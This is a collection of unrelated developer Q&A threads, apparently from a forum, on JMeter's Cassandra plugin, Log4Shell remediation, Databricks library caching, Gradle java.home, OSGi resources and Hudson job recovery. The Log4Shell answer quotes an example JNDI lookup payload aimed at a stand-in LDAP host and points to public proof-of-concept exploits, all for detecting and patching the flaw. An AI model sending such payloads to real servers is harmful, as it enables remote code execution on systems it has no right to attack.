I want to use JMeter to measure Cassandra's response time for some queries and for multiple simultaneous accesses.
I'm trying to follow the instructions on this page:
https://github.com/slowenthal/jmeter-cassandra
First, I unpacked the archive into the JMeter install directory. However, when I try to access the Cassandra plugin through JMeter, I cannot find it.
Does anyone know whether I am following the appropriate instructions, or what I can do to make everything work properly?
If you unpacked the archive into the correct location, it should be enough to restart JMeter.
If you're manually copying jars from the jmeter-cassandra release bundle, the best locations are:
for jmeter-cassandra-x.x.x.jar - JMeter's /lib/ext folder
for all other jars - JMeter's /lib folder
A third option is to set the user.classpath property in the user.properties file to point to the folder containing the Cassandra jars. Again, a JMeter restart will be required to pick up the property value.
And finally, you can use the "Add directory or jar to classpath" section of the Test Plan.
Latest JMeter 2.13 r1665067 seems to be working fine with jmeter-cassandra-0.9.2
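For example, the manual-copy option might look like this on Linux (a rough sketch only; run it from the directory where the bundle was unpacked, and treat JMETER_HOME and the x.x.x version as placeholders for your setup):
for jar in *.jar; do
  if [ "$jar" = "jmeter-cassandra-x.x.x.jar" ]; then
    cp "$jar" "$JMETER_HOME/lib/ext/"   # the plugin jar goes to lib/ext
  else
    cp "$jar" "$JMETER_HOME/lib/"       # all other jars go to lib
  fi
done
Restart JMeter afterwards so it rescans lib and lib/ext.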
Recently there was a log4j vulnerability reported:
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
https://www.randori.com/blog/cve-2021-44228/
https://www.lunasec.io/docs/blog/log4j-zero-day/
How do I know whether my system has been attacked or exploited via arbitrary code injection?
Thank you so much
UPDATE: 2021-12-18...
Remember to always check for the latest information from the resources listed below
CVE-2021-45105... 2.16.0 and 2.12.2 are no longer valid remediations! The current fixing versions are 2.17.0 (Java 8) and 2.12.3 (Java 7). All other Java versions have to take the stop-gap approach (removing/deleting the JndiLookup.class file from the log4j-core JAR).
I have updated my message below accordingly.
Answering the question directly:
The Reddit thread log4j_0day_being_exploited has SEVERAL resources that can help you.
To detect the vulnerability
Ctrl+F for "Vendor Advisories". Check those lists to see if you are running any of that software. If you are, and an update is available for it, update.
THEN Ctrl+F for ".class and .jar recursive hunter". Run the program there; if it finds anything, remediate.
You can also Ctrl+F for "Vulnerability Detection" if you want to perform a manual, active test of your systems for the vulnerability.
To detect an exploit... this is more complex, and all I can do is tell you to
Ctrl+F for "Vendor Advisories"... search through the material there... I'm not sure which option will be best for you.
More resources
https://www.reddit.com/r/blueteamsec/comments/rd38z9/log4j_0day_being_exploited/
This one has TONS of useful info including detectors, even more resource links, very easy to understand remediation steps, and more
https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance
https://github.com/cisagov/log4j-affected-db
https://logging.apache.org/log4j/2.x/security.html
Remediation:
CVE-2021-45046 ... CVE-2021-44228 ... CVE-2021-45105
While most people that need to know probably already know enough to do what they need to do, I thought I would still put this just in case...
Follow the guidance in those resources... it may change, but
As of 2021-12-18
It's basically
Remove log4j-core JAR files if possible
Both from running machines, for an immediate fix, AND
from your source code / source code management files, to prevent future builds / releases / deployments from overwriting the change
If that is not possible (due to a dependency), upgrade them
If you are running Java 8, then you can upgrade to log4j 2.17.0+
If you are running Java 7, then you can upgrade to log4j 2.12.3
If you are running an even older version of Java, then you need to upgrade to the newest version of Java, and then use the newest version of Log4j
Again, these changes have to happen both on the running machines and in the code
If neither of those is possible for some reason... then there is the NON-remediation stop-gap of removing the JndiLookup.class file from the log4j-core JARs.
There is a one-liner for the stop gap option on Linux using the zip command that comes packaged with most Linux distros by default.
zip -q -d "$LOG4J_JAR_PATH" org/apache/logging/log4j/core/lookup/JndiLookup.class
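To locate the jars to feed into that one-liner, a simple sweep like the one below can help; note that this is only a sketch and only finds conventionally named files, so shaded/uber jars that repackage log4j will be missed:
find / -type f -name 'log4j-core-*.jar' 2>/dev/null | while read -r jar; do
  zip -q -d "$jar" org/apache/logging/log4j/core/lookup/JndiLookup.class
done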
At the time of writing, most of the online guides for the stop-gap option on Windows say to do the following (again... assuming you can't do one of the remove-JAR or upgrade options above):
Install something like 7-zip
Locate all of your log4j-core JAR files and for each one do the following...
Rename the JAR to change the extension to .zip
Use 7-zip to unzip the JAR (which now has a .zip extension)
Locate and remove the JndiLookup.class file from the unzipped folder
The path is \path\to\unzippedFolder\org\apache\logging\log4j\core\lookup\JndiLookup.class
Delete the old JAR file (which now has an extension of .zip)
Use 7-zip to RE-zip the folder
Rename the new .zip folder to change the extension to .jar
There are also some options that use PowerShell
Reddit thread: log4j_0day_being_exploited
Ctrl+F for "PowerShell"
This is fine if you only have 1 or 2 JAR files to deal with and you don't mind installing 7-zip, or you have PowerShell available to do it. However, if you have lots of JAR files, or if you don't want to install 7-zip and don't have access to PowerShell, I created an open-source VBS script that will do it for you without needing to install any additional software: https://github.com/CrazyKidJack/Windowslog4jClassRemover
Read the README and the Release Notes https://github.com/CrazyKidJack/Windowslog4jClassRemover/releases/latest
You can check your request logs for something that looks like this:
${jndi:ldap://example.com:1234/callback}
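As a rough first pass, you can grep your web server's access/request logs for the raw lookup string; the path below is only an example, and keep in mind that real attacks are often obfuscated (e.g. ${${lower:j}ndi:...}), so a plain-string search will not catch everything:
grep -rF '${jndi:' /var/log/nginx/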
If you want to check whether you can be attacked, you can run a PoC from GitHub. This link seems to be the first PoC released; you can now find others.
You can also find black-box testing here.
On Databricks on Azure:
I follow these steps:
create a library from a python egg, say simon_1_001.egg which contains a module simon.
attach the library to a cluster and restart the cluster
attach a notebook to the cluster and run:
import simon as s
print s.__file__
run the notebook and it correctly gives me a file name including the string 'simon_1_001.egg'
then detach and delete the egg file, even emptying trash.
restart the cluster, detach and re-attach the notebook, run it, and instead of complaining that it can't find module simon, it runs and displays the same string
Similarly if I upload a newer version of the egg, say simon_1_002.egg, it still displays the same string.
If I wait half an hour, then clear and rerun a few times, eventually it will pick up the new library and display simon_1_002.egg.
How can I properly clear down the old egg files?
Simon, this is a bug in the Databricks platform. When a library is created in Databricks from a jar, the file is stored in dbfs:/FileStore, and under /databricks/python2/lib/python2.7/site-packages/ for Py2 clusters and /databricks/python3/lib/python3.5/site-packages/ for Py3 clusters.
In both the jar and egg cases, the path is stored when the library is created. When a library is detached and removed from the Trash, it is supposed to remove the copy from DBFS, which it currently does not do.
To alleviate this inconsistency, you might want to check the Environment sub-tab in the Spark UI, or use %sh ls in a cell to look in the appropriate paths, to verify whether a library has been removed correctly; you can also remove the leftovers with a %sh rm command before restarting the cluster and attaching a newer version of the library.
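For example, in a notebook cell on a Py3 cluster (paths as above; "simon" is the module from the question, and the exact file or folder names on your cluster may differ), something like this can confirm and clean up the stale copy before restarting the cluster:
%sh
ls /databricks/python3/lib/python3.5/site-packages/ | grep -i simon
# if a stale copy shows up, remove it and then restart the cluster
rm -rf /databricks/python3/lib/python3.5/site-packages/simon*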
There's another fun Databricks platform bug in job dependencies. Removing a dependent library in the UI doesn't do anything, so old dependency versions are stuck there and jobs fail even if you delete the jar/egg from DBFS.
The only option seems to be updating the jobs using the CLI or API. So you'll need to do something along these lines (CLI):
databricks jobs list
Find your job id, then:
databricks jobs get --job-id 5
Save the output to a json file job.json, remove stuff outside settings, copy stuff from settings to the root of the json document, remove the unwanted libraries, and then do:
databricks jobs reset --job-id 5 --json-file job.json
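If you have jq available, the "remove stuff outside settings" step can be scripted roughly like this (the library list itself still has to be edited by hand, or with a more elaborate jq filter):
databricks jobs get --job-id 5 | jq '.settings' > job.json
# edit job.json to drop the unwanted libraries, then:
databricks jobs reset --job-id 5 --json-file job.json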
I'm working on 2 different machines (home vs. work) and transfer the code via GitHub, which works nicely, but I just ran into a machine dependency when I added this code to the gradle.properties file to fix a vexing OAuth issue for Google Sheets:
org.gradle.java.home=C:\Program Files\Java\jdk1.8.0_131
org.gradle.java.home=C:\Program Files\Java\jdk1.8.0_77
Now I have to toggle between the 2 lines to get Gradle to compile. I need to check whether I still need it (since I got the keystore files etc. sorted out), but I also wonder whether there is an easy solution to make this work (e.g. something like an ifdef).
Obviously, I could just change the directory name on one of the machines, I guess, but I'm still curious how to solve this within Studio.
Let's start with a quote from the Gradle docs:
org.gradle.java.home
Specifies the Java home for the Gradle build process. The value can be set to either a jdk or jre location, however, depending on what your build does, jdk is safer. A reasonable default is used if the setting is unspecified.
So, by default, you should not need this project property (that's what they are called in Gradle).
However, there can be reasons why you need to specify the Java directory. For this specific project property, you can follow Ray Tayek's advice and use the JAVA_HOME environment variable (on both systems). But there is also another approach, which can be used for any project property (and also for so-called system properties):
gradle.properties files can be located at different locations in the file system. Your file is located in the project directory and is therefore included in your VCS. You can use it for project-related properties. An additional location is the Gradle user home directory, which by default is the .gradle folder in your personal folder. This folder is not under version control, so simply define the property there.
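For example (a sketch using the paths from the question; which JDK sits on which machine is just an assumption here), each machine would get its own entry in its Gradle user home, e.g. C:\Users\<you>\.gradle\gradle.properties:
# on the work machine
org.gradle.java.home=C:\Program Files\Java\jdk1.8.0_131
# on the home machine
org.gradle.java.home=C:\Program Files\Java\jdk1.8.0_77
The gradle.properties checked into the project then no longer needs the line at all.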
Try removing the line from the properties file. If that fails, try setting JAVA_HOME on each machine.
There are a lot of related questions.
You might try asking on the Gradle forums.
Part 1: I've been trying to load an (XML) file as a resource from disk using the bundle class loader. I can't package the file in a bundle beforehand, as it'll be generated at runtime. I tried searching too, and almost always people talk about loading resources from within a bundle (either the same or a different one). So is it even possible to load a resource from disk in an OSGi environment using the bundle classloader? If yes, how can it be done?
Part 2: Now I need to add a constraint to the above. In my complete scenario, while I'd be generating the file, it would be loaded by a third-party bundle. In this case, what could be done (generate in a certain location, any changes to classpath etc.) so that the third-party bundle's class loader could find the generated file?
Using: Apache Karaf 3.0.2, Ubuntu 12.
Part 1:
So is it even possible to load a resource from disk in an OSGi environment using bundle classloader?
Classloaders can load resources (read-only files on the classpath), but not ordinary files from arbitrary folders on disk. Use the classloader when you want to process the content of files that are on the classpath.
You want to generate a temporary file (generated and processed at runtime) so you should use the standard Java API for that:
File myTmpFile = File.createTempFile(...);
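// note: with the two-argument overload the file is created in the default temporary-file directory (the java.io.tmpdir system property)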
For more info, see the javadoc of this function: https://docs.oracle.com/javase/7/docs/api/java/io/File.html#createTempFile(java.lang.String,%20java.lang.String)
Part 2:
The third-party bundle should have an API that accepts a File, URL, Path, or some other type that can point to a file in the file system.
Where and how are Hudson jobs and slave information stored?
I accidentally canceled a Hudson upgrade today. It wouldn't permit me to continue the upgrade; only to downgrade to the previous version and then upgrade again. After I downgraded, the two jobs I had created in the recent past were gone from the dashboard along with the slave node I created for one of those jobs, and the job I had recently deleted showed up in the dashboard. After the upgrade, the jobs and nodes are in that same state.
What happened? Can I restore my recent jobs and nodes, and how would I do that? Please keep in mind that while I know C/C++ well, web services are out of my area and I don't really know what a jar or a war is... I just followed online directions to install and set up Hudson and it worked. I wish to avoid simply re-creating those jobs; setting up one of them was less than trivial.
More info: Looking in the configuration, the home directory is incorrect; it thinks HOME is /root/ instead of /home/hudson. How did it change, and how do I change it back?
The previous version of Hudson is 1.379. It's currently running 1.381. I'm running it on RHEL 5.
When I look in the .hudson/jobs directory, both of the recent jobs are there, and the previously deleted job is not there. These job directories are missing their "workspace" directories.
As you've noticed, job configuration is stored in HUDSON_HOME/jobs/[name]/config.xml.
Slave configuration is stored in the main Hudson config file, HUDSON_HOME/config.xml.
I'm not sure why Hudson didn't pick up the jobs when you restarted after the upgrade. Checking the Hudson log might provide a clue, usually /var/log/hudson/hudson.log.
If your jobs' config.xml files are present, Hudson might be able to reread them if you reload your configuration (Manage Hudson -> Reload Configuration From Disk). If Hudson still doesn't recognize them (and the config file is present), your best bet is probably to recreate the jobs manually grabbing whatever you can from the config file (keeping in mind that XML escapes are applied to text fields like the build commands).
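If you want to double-check what is actually on disk, a quick look on the server might be something like this (assuming the paths mentioned in the question; adjust if your HUDSON_HOME differs):
ls /home/hudson/.hudson/jobs/*/config.xml
tail -n 50 /var/log/hudson/hudson.log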
I got a helpful clue when I revisited the "manage hudson" page and saw a message that I had data in an old and unreadable format. That suggested Hudson was running a .war that was different from the one used more recently. So I searched the disk for any "hudson.war" files and found two; one from a couple of weeks ago and one from some months ago. The newer one is in the place I expected to find one, and the older one was elsewhere. I renamed the older one. Also, I have a start-hudson.sh script, added 'export HUDSON_HOME=/home/hudson' to that script, and used it to restart hudson. Lo and behold, my new jobs were back and working.
I would have thought that simply setting the HUDSON_HOME variable would have done it, but I did that first and restarted Hudson, and no joy. It was only after I renamed the older .war AND set the environment variable that I found the fix. My guess would be that the older .war file had root set as HUDSON_HOME and that somehow that .war was being run, even though the version shown on the page was the current version. I don't understand it, but I'm happy to be back in business.
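For reference, the relevant part of a start script along the lines described above might be as simple as this (the war and log paths are assumptions; point them at wherever your hudson.war and log actually live):
#!/bin/sh
export HUDSON_HOME=/home/hudson
nohup java -jar /home/hudson/hudson.war >> /var/log/hudson/hudson.log 2>&1 &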